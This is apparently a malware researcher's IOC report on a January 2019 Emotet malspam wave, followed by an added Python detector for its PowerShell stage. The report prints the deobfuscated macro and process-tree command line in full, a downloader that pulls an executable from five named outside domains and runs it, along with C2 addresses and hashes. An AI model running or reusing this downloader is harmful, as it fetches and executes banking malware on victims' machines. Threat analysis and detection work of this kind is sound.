VRad

#emotet_280119

Jan 28th, 2019
#IOC #OptiData #VR #emotet #feodo #banker #xml #powershell

https://pastebin.com/z2TDfM7s

previous contact:
23/01/18 https://pastebin.com/D9TDts5J
20/12/18 https://pastebin.com/EejcbL4t
04/12/18 https://pastebin.com/znQDtbnt
09/11/18 https://pastebin.com/THHMs2wg
01/10/18 https://pastebin.com/Y6DnbpHv

FAQ:
https://twitter.com/dvk01uk/status/1087660817452011520
https://pastebin.com/g8gMJKui
https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
https://kc.mcafee.com/corporate/index?page=content&id=KB90108

attack_vector
--------------
email attach .doc (XML) > macro > cmd > powershell_v5(!) > GET 5 URL > %temp%\***.exe

email_headers
--------------
Received: from qproxy4-pub.mail.unifiedlayer.com (qproxy4-pub.mail.unifiedlayer.com [66.147.248.250])
by srv8.victim1.com for <user0@org7.victim1.com>;
(envelope-from muhammad.suleman@ff.com.pk)
Received: from cmgw11.unifiedlayer.com (unknown [10.9.0.11])
by qproxy4.mail.unifiedlayer.com (Postfix) for <user0@org7.victim1.com>;
Received: from box675.bluehost.com ([66.147.244.175])
Received: from [190.183.58.77] (port=59810 helo=10.4.44.65)
by box675.bluehost.com (envelope-from <muhammad.suleman@ff.com.pk>)
Date: Mon, 28 Jan 2019 04:03:36 -0300
From: Цимбаленко <otsimbalenko@org0.ua> <muhammad.suleman@ff.com.pk>
To: user0@org7.victim1.com
Subject: Invoices from Цимбаленко

files
--------------
SHA-256 4e4074f7239656bdf361fc6bc8df862ed053105036d3bfad718f6492bc313465
File name INV_JSO9316077-679.doc (XML)
File size 134.98 KB

SHA-256 79d4e70bf4c1f9eb8dc0c6e765fc2f5d1f48737fc0859a8a1130d99e65e441a2
File name 0C0sib5OX.exe (PE)
File size 140 KB

activity
**************

deobfuscated_macro
--------------
powershell $apcjv='quduu';$wajal=new-object Net.WebClient;$dhbwoqn='tunerg{.} com/VhIZE8i3Fn@stoutarc{.} com@leonardokubrick{.} com/VvJBwtEF5w@antigua.aguilarnoticias{.} com/t1JnOLFO@regenerationcongo{.} com/UL2s3PGpv0'.Split('@');$vwhpj='wnwumd';$tzimwc = '604';$cktii='fppqf';$wvmjf=$env:temp+'\'+$tzimwc+'.exe';foreach($kkffho in $dhbwoqn){try{$wajal.DownloadFile($kkffho, $wvmjf);$ksimd='hwori';If ((Get-Item $wvmjf).length -ge 40000) {Invoke-Item $wvmjf;$oikri='kbccf';break;}}catch{}}$zqlki='cirmiw';


pl_src: 4/5
--------------
tunerg{.} com/VhIZE8i3Fn 200
stoutarc{.} com 200
leonardokubrick{.} com/VvJBwtEF5w 200
antigua.aguilarnoticias{.} com/t1JnOLFO 404 (reported)
regenerationcongo{.} com/UL2s3PGpv0 200

C2:
--------------
187.155.130.72:8080

netwrk
--------------
210.188.201.17 tunerg{.} com GET /VhIZE8i3Fn HTTP/1.1 noUA
187.155.130.72:8080

comp
--------------
powershtll.exe 2676 TCP 210.188.201.17 80 ESTABLISHED
turnedbased.exe 1648 TCP 201.194.127.211 990 SYN_SENT

proc
--------------
C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
c:\windows\system32\cmd.exe c:\oucvl\ffaiizm\klfrwkw\..\..\..\windows\system32\cmd.exe /c CmD /V:O/C"set vb=eL{~6'1i0fp;S4oFl2u@g.dwGUJ:EsyTh(CPb\czNmVvD=xkW$AZa-I )3}n/M8+%OB,5qrjt&&for %Z in ...do set ao=!ao!!vb:~%Z,1!&&if %Z==83 echo !ao:~-577!|cmd.exe"
C:\Windows\system32\cmd.exe CmD /V:O/C"set vb=eL{~6'1i0fp;S4oFl2u@g.dwGUJ:EsyTh(CPb\czNmVvD=xkW$AZa-I )3}n/M8+%OB,5qrjt&&for %Z in ...do set ao=!ao!!vb:~%Z,1!&&if %Z==83 echo !ao:~-577!|cmd.exe"
C:\Windows\system32\cmd.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershtll.exe powershtll $apcjv='quduu';$wajal=new-object Net.WebClient;$dhbwoqn='http://tunerg.com/VhIZE8i3Fn@http://stoutarc.com/J8htynMd3@http://leonardokubrick.com/VvJBwtEF5w@http://antigua.aguilarnoticias.com/t1JnOLFO@http://regenerationcongo.com/UL2s3PGpv0'.Split('@');$vwhpj='wnwumd';$tzimwc = '604';$cktii='fppqf';$wvmjf=$env:temp+'\'+$tzimwc+'.exe';foreach($kkffho in $dhbwoqn){try{$wajal.DownloadFile($kkffho, $wvmjf);$ksimd='hwori';If ((Get-Item $wvmjf).length -ge 40000) {Invoke-Item $wvmjf;$oikri='kbccf';break;}}catch{}}$zqlki='cirmiw';
C:\tmp\604.exe
C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe

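The deobfuscated macro and the proc tree above show the same downloader stage: a '@'-joined list of five URLs, a WebClient.DownloadFile loop into %temp%, a 40000-byte size gate, then Invoke-Item. The junk variable names change per sample, so detection has to key on that behaviour rather than on strings. The Python script below is an added example (not part of VRad's paste or of any tool it links): it takes the PowerShell command line from the proc section, embedded here as a sample as a process-creation log would record it (Sysmon Event ID 1 or Windows 4688 is an assumed data source), flags the pattern, and extracts the payload URLs in the report's own `{.}` defanged form, the drop path and the size gate.

```python
import json
import re
import sys
from urllib.parse import urlsplit

# Constructed sample: the PowerShell command line from the "proc" section of
# this report, as a process-creation event (Sysmon Event ID 1 or Windows 4688,
# an assumed data source) would record it. Embedded so the script runs offline;
# the image name is kept exactly as the report spells it.
SAMPLE_CMDLINE = (
    "powershtll $apcjv='quduu';$wajal=new-object Net.WebClient;"
    "$dhbwoqn='http://tunerg.com/VhIZE8i3Fn@http://stoutarc.com/J8htynMd3@"
    "http://leonardokubrick.com/VvJBwtEF5w@http://antigua.aguilarnoticias.com/t1JnOLFO@"
    "http://regenerationcongo.com/UL2s3PGpv0'.Split('@');$vwhpj='wnwumd';$tzimwc = '604';"
    "$cktii='fppqf';$wvmjf=$env:temp+'\\'+$tzimwc+'.exe';"
    "foreach($kkffho in $dhbwoqn){try{$wajal.DownloadFile($kkffho, $wvmjf);$ksimd='hwori';"
    "If ((Get-Item $wvmjf).length -ge 40000) {Invoke-Item $wvmjf;$oikri='kbccf';break;}}"
    "catch{}}$zqlki='cirmiw';"
)

# Behavioural traits of this downloader stage. Variable names are random per
# sample, so matching is on the API calls and the control flow instead.
INDICATORS = {
    "webclient": r"new-object\s+(?:System\.)?Net\.WebClient",
    "downloadfile": r"\.DownloadFile\(",
    "url_list_split": r"\.Split\('@'\)",
    "temp_drop": r"\$env:temp",
    "size_gate": r"\.length\s+-ge\s+\d+",
    "run_dropped_file": r"Invoke-Item|Start-Process",
}


def extract_urls(cmdline):
    """Return the '@'-joined payload URL list, or [] if that pattern is absent."""
    m = re.search(r"'([^']*)'\.Split\('@'\)", cmdline)
    return m.group(1).split("@") if m else []


def defang(url):
    """Write a URL the way this report does: scheme dropped, last host dot as '{.} '."""
    parts = urlsplit(url)
    host, _, tld = parts.netloc.rpartition(".")
    return f"{host}{{.}} {tld}{parts.path}"


def extract_drop_path(cmdline):
    """Resolve $env:temp+'\\'+$var+'.ext' to %TEMP%\\<value>.ext, or None."""
    m = re.search(r"\$env:temp\+'\\'\+\$(\w+)\+'([^']+)'", cmdline)
    if not m:
        return None
    var, ext = m.groups()
    # The file stem is assigned earlier in the one-liner as $var = 'value'.
    assign = re.search(r"\$" + re.escape(var) + r"\s*=\s*'([^']*)'", cmdline)
    return f"%TEMP%\\{assign.group(1)}{ext}" if assign else None


def extract_size_gate(cmdline):
    """Minimum byte count the script demands before running the download, or None."""
    m = re.search(r"\.length\s+-ge\s+(\d+)", cmdline, re.IGNORECASE)
    return int(m.group(1)) if m else None


def analyze(cmdline):
    """Score one command line and pull out the IOCs a responder would want."""
    hits = [name for name, pat in INDICATORS.items()
            if re.search(pat, cmdline, re.IGNORECASE)]
    urls = extract_urls(cmdline)
    return {
        "indicators": hits,
        "suspicious": len(hits) >= 3,
        "urls": urls,
        "defanged": [defang(u) for u in urls],
        "drop_path": extract_drop_path(cmdline),
        "min_size": extract_size_gate(cmdline),
    }


if __name__ == "__main__":
    # Pass a command line as the first argument, or run on the embedded sample.
    target = sys.argv[1] if len(sys.argv) > 1 else SAMPLE_CMDLINE
    print(json.dumps(analyze(target), indent=2))
```

Three or more traits are needed for a hit so that a lone `$env:temp` or `Invoke-Item` in an admin script does not fire; the extracted URL list is what gets handed to proxy and DNS logs to find other hosts that fetched the same payload.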
persist
--------------
n/a

drop
--------------
C:\tmp\604.exe
C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe

# # #
https://www.virustotal.com/#/file/4e4074f7239656bdf361fc6bc8df862ed053105036d3bfad718f6492bc313465/details
https://www.virustotal.com/#/file/79d4e70bf4c1f9eb8dc0c6e765fc2f5d1f48737fc0859a8a1130d99e65e441a2/details
https://analyze.intezer.com/#/analyses/0bb6533d-294a-45ab-a85b-6b546e993db3

VR

@